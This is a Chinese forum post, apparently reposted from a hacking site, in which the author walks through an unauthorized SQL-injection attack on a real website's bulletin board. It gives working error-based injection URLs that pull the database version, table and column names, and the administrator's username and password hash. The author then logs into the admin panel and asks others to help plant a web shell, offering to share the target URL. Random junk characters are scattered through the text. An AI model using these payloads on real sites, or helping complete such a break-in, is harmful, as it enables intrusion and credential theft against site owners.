近一直在学习数据库方面的知识,一直在钻研PHP的一些高级注入语法,感觉比较的有意思。于是就在网上找有洞的网站练习手注。于是有了下文。' ]# R; i0 I% g
首先找到网站后台,加了个admin,后台出来了
$ y( Y8 |" D* q/ Y8 Q+ K5 X0 `. ~- U# j1 l( ?, D
- |! y& O# C2 F7 |) k
然后看了下网站,发现貌似都是html静态网页,但是通过图片链接发现应该是伪静态,于是在后面加了个 ',报错了,初步判断可以注入
/ U" [5 e3 a" ]8 r8 V- Z. ~http://www.myhack58.com/Article/UploadPic/2012-12/20121218145843714.jpg 从报错语句中我们可以判断出存在frame_board_conference 表,知道存在frame_board_conference,可以方便我们后面的注入。这里我用的是错误回显注入。 首先查下数据库相关信息。 www.xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*) from+frame_board_conference+group+by+concat(0x3a,concat(0x3a,database(),0x3a,version()),floor(rand(0)*2)))—
7 f: p$ d$ Q3 m+ @8 i+ q* z M Z# F3 G2 O: R) l4 t. j
. Y. }' p4 m1 Z& g" }8 }4 ? E- V4 I5 _3 W+ r. n
+ u# Q/ B; U# B6 F `http://www.myhack58.com/Article/UploadPic/2012-12/20121218145846722.jpg
) K# T* w" p- Q$ {2 x0 |& l
' ?# x$ i9 B$ j1 }8 W* b4 @+ j% r- [9 S* c
& f" r# }( c& K* \* x
7 K% L/ ~% D0 E: c. C- d9 ?可以看到数据库版本为5.0.32,存在information_schema表,可以进一步的注入。 然后我们查表 http://xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(table_name),1,150)from+information_schema.tables+where+table_schema=database()),0x3a,floor(rand(0)*2)))-- 得到管理员表段frame_administrator8 ~8 @2 F% J! X" B: [
1 \* e& }; l1 `: p
" `: G+ q( _5 s9 b, n& E; Thttp://www.myhack58.com/Article/UploadPic/2012-12/20121218145846695.jpg# n1 e9 N% z& f# ?5 L% }3 L: y
, I' K5 c! [- q9 v$ N1 Z4 u! J6 w W
查字段 http://www.xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(column_name),1,150)from+information_schema.columns+where+table_name=0x6672616d655f61646d696e6973747261746f72),0x3a,floor(rand(0)*2)))--
2 H3 _- J& C! Z5 w+ F; [
) u5 i. I9 V5 N X' r+ g+ B0 c" u3 |4 v$ N3 |
3 K) t+ M5 E6 K/ ]* x3 Y8 `$ V 得到userID,userPass字段 最后 http://xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(userID,0x3a,userPass,0x0a),1,150)from+frame_administrator),0x3a,floor(rand(0)*2)))--3 `1 c) ^2 V/ h) z; g
6 P! \; ^4 d5 j. ^
2 e& `. E4 Q( C1 J/ C
! l/ U+ R* _( t9 p. j5 |" @( f1 k 得到最终结果admin eb0a191797624dd3a48fa681d3061212 解密后成功进入后台,但是在获得shell的过程中出了点问题,可以穿php但是貌似无法解析,不知道什么原因,本人很菜,在这里希望大牛有兴趣的话帮忙拿下shell,感激不尽。Pm我,我把网址发给你。 |